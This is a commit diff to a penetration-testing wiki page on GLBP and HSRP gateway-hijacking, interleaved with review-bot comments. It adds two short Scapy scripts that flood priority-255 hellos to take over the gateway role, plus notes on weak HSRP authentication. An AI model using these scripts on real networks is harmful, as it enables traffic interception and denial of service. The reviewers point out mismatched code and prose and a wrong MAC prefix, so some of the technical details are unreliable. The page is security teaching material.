Commit 90fe545

Merge pull request #1865 from HackTricks-wiki/research_update_src_generic-methodologies-and-resources_pentesting-network_glbp-and-hsrp-attacks_20260206_023647
Research Update Enhanced src/generic-methodologies-and-resou...
2 parents 145a58d + e7e5d27 commit 90fe545

1 file changed

Lines changed: 40 additions & 5 deletions

File tree

src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md

@@ -13,6 +13,8 @@ FHRP is designed to provide network robustness by merging multiple routers into
1313

1414
Cisco's creation, GLBP, functions on the TCP/IP stack, utilizing UDP on port 3222 for communication. Routers in a GLBP group exchange "hello" packets at 3-second intervals. If a router fails to send these packets for 10 seconds, it is presumed to be offline. However, these timers are not fixed and can be modified.
1515

16+
GLBP for IPv6 uses multicast **FF02::66** over UDP/3222, and the virtual MAC format becomes `0007.b4xx.xxyy` (AVF ID is in the last byte). Timing and attack surface remain the same as in IPv4, so hijack techniques still work in dual‑stack networks.
17+
1618
### GLBP Operations and Load Distribution
1719

1820
GLBP stands out by enabling load distribution across routers using a single virtual IP coupled with multiple virtual MAC addresses. In a GLBP group, every router is involved in packet forwarding. Unlike HSRP/VRRP, GLBP offers genuine load balancing through several mechanisms:
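Review bot: the closing claim of the new paragraph, that "hijack techniques still work in dual-stack networks", is asserted without a source, and the hunk adds none of the defensive counterpart to the new FF02::66 / UDP 3222 / `0007.b4xx.xxyy` details. Suggest citing a reference for the IPv6 behaviour and adding one sentence noting that the group authentication the later sections describe as the deciding factor ("if authentication is absent") applies equally to the IPv6 group, and that a hello on FF02::66/UDP 3222 from a source that is not a configured group member is the signal defenders should alert on.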
@@ -35,6 +37,20 @@ For interactions, GLBP employs the reserved multicast address 224.0.0.102 and UD
3537

3638
An attacker can become the primary router by sending a GLBP packet with the highest priority value (255). This can lead to DoS or MITM attacks, allowing traffic interception or redirection.
3739

40+
**Practical GLBP hijack with Scapy (short PoC)**
41+
42+
```python
43+
from scapy.all import *
44+
45+
vip = "10.10.100.254" # learned from sniffing
46+
pkt = IP(dst="224.0.0.102")/UDP(dport=3222,sport=3222)/Raw(
47+
b"\x01\x00\xff\x64" # Version=1, Opcode=Hello, Priority=255, Weight=100
48+
)
49+
send(pkt, iface="eth0", loop=1, inter=1)
50+
```
51+
52+
Craft the payload bytes to mimic the GLBP header (version/opcode/priority/weight/VRID). Looping the frame ensures you win the AVG election if authentication is absent.
53+
3854
### Executing a GLBP Attack with Loki
3955

4056
[Loki](https://github.com/raizo62/loki_on_kali) can perform a GLBP attack by injecting a packet with priority and weight set to 255. Pre-attack steps involve gathering information like the virtual IP address, authentication presence, and router priority values using tools like Wireshark.
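Review bot: the Scapy block assigns `vip = "10.10.100.254"` but never uses it, and the sentence under the block tells the reader the payload must mimic "version/opcode/priority/weight/VRID" while the code's comment documents only four fields, so the prose and the code disagree; either remove the unused variable and the VRID mention or document what the snippet actually sends. The block also duplicates what the Loki section directly below already covers (priority and weight injection, pre-attack checks for "authentication presence"), and neither place states the mitigation; suggest one line saying that GLBP group authentication is the control that decides the outcome and that hellos advertising priority 255 from an unknown source are the detection signal.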
@@ -75,6 +91,8 @@ Monitoring and intercepting traffic can be done using net-creds.py or similar to
7591

7692
HSRP is a Cisco proprietary protocol designed for network gateway redundancy. It allows the configuration of multiple physical routers into a single logical unit with a shared IP address. This logical unit is managed by a primary router responsible for directing traffic. Unlike GLBP, which uses metrics like priority and weight for load balancing, HSRP relies on a single active router for traffic management.
7793

94+
HSRPv1 uses multicast **224.0.0.2** and virtual MAC `0000.0c07.acXX`; HSRPv2 and HSRPv2 for IPv6 use **224.0.0.102 / FF02::66** and virtual MAC `0000.0c9f.fXXX`. UDP destination port is **1985** for IPv4 and **2029** for IPv6.
95+
7896
#### Roles and Terminology in HSRP
7997

8098
- **HSRP Active Router**: The device acting as the gateway, managing traffic flow.
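Review bot: the sentence "HSRPv2 and HSRPv2 for IPv6 use 224.0.0.102 / FF02::66 and virtual MAC `0000.0c9f.fXXX`" conflates two variants: `0000.0c9f.fXXX` is the HSRPv2 IPv4 virtual MAC range, whereas HSRP for IPv6 (that is its name, not "HSRPv2 for IPv6") uses a separate block that Cisco documents as 0005.73a0.0XXX. Suggest splitting this into one line per variant (v1, v2, IPv6), each with its multicast group, UDP port and virtual MAC prefix, so the prefixes match what a defender would filter on when auditing which MACs are answering for the gateway address.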
@@ -91,6 +109,26 @@ HSRP comes in two versions, HSRPv1 and HSRPv2, differing mainly in group capacit
91109

92110
HSRP attacks involve forcibly taking over the Active Router's role by injecting a maximum priority value. This can lead to a Man-In-The-Middle (MITM) attack. Essential pre-attack steps include gathering data about the HSRP setup, which can be done using Wireshark for traffic analysis.
93111

112+
**Quick HSRP takeover with Scapy**
113+
114+
```python
115+
from scapy.all import *
116+
117+
vip = "10.10.100.1"
118+
pkt = IP(dst="224.0.0.102")/UDP(sport=1985,dport=1985)/Raw(
119+
b"\x00\x02\xff\x03\x00\x00\x00\x01" # Hello, priority 255, group 1
120+
)
121+
send(pkt, iface="eth0", inter=1, loop=1)
122+
```
123+
124+
If authentication is **not** configured, continuously sending hellos with higher priority forces peers into *Speak*/*Listen* states and lets you become *Active*, redirecting traffic through your host.
125+
126+
**HSRP authentication corner cases**
127+
128+
- Legacy plain-text auth is trivially spoofable.
129+
- MD5 authentication only covers the HSRP payload; crafted packets can still rate-limit/DoS control planes. NX-OS releases previously allowed DoS against authenticated groups (see Cisco advisory CSCup11309).
130+
- On many ISP / VPS shared VLANs, HSRPv1 multicasts are visible to tenants; without auth you can join and preempt traffic.
131+
94132
#### Steps for Bypassing HSRP Authentication
95133

96134
1. Save the network traffic containing HSRP data as a .pcap file.
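Review bot: the Scapy block is inconsistent with the addressing paragraph added in the previous hunk: it pairs UDP 1985 with 224.0.0.102 (the HSRPv2 group) while its comment describes a v1-style "Hello, priority 255, group 1", and `vip` is assigned but never used; the text and code should agree on which HSRP version the snippet targets. In the corner-cases list, "Cisco advisory CSCup11309" names a Cisco bug ID rather than an advisory; the References entry links it to the advisory page for CVE-2014-3295, so cite that identifier here for consistency. The three bullets also give only the attacker-side view although the very next section, "Steps for Bypassing HSRP Authentication", presupposes that authentication is deployed; suggest a sentence stating that MD5 authentication is the control being discussed and that the state transitions described above (peers pushed into Speak/Listen by a priority-255 hello) are the events a defender should alert on.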
@@ -135,9 +173,6 @@ Executing these steps places the attacker in a position to intercept and manipul
135173
## References
136174

137175
- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
138-
139-
176+
- [Cisco NX-OS HSRP authentication DoS (CSCup11309)](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/Cisco-SA-20140611-CVE-2014-3295)
177+
- [Reddit: HSRP seen on VPS shared VLANs](https://www.reddit.com/r/networking/comments/1h0v1aq/hsrp_seen_on_cloud_vlans_without_auth/)
140178
{{#include ../../banners/hacktricks-training.md}}
141-
142-
143-
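Review bot: the new Reddit entry is the sole source for the body claim that "on many ISP / VPS shared VLANs, HSRPv1 multicasts are visible to tenants"; one forum thread does not support "many", so either qualify that sentence as a reported observation or add a second source. The Cisco entry's link text names CSCup11309 while the URL is the CVE-2014-3295 advisory page; include the CVE in the link text so readers searching by CVE can find it. Dropping the trailing blank lines after the include is fine.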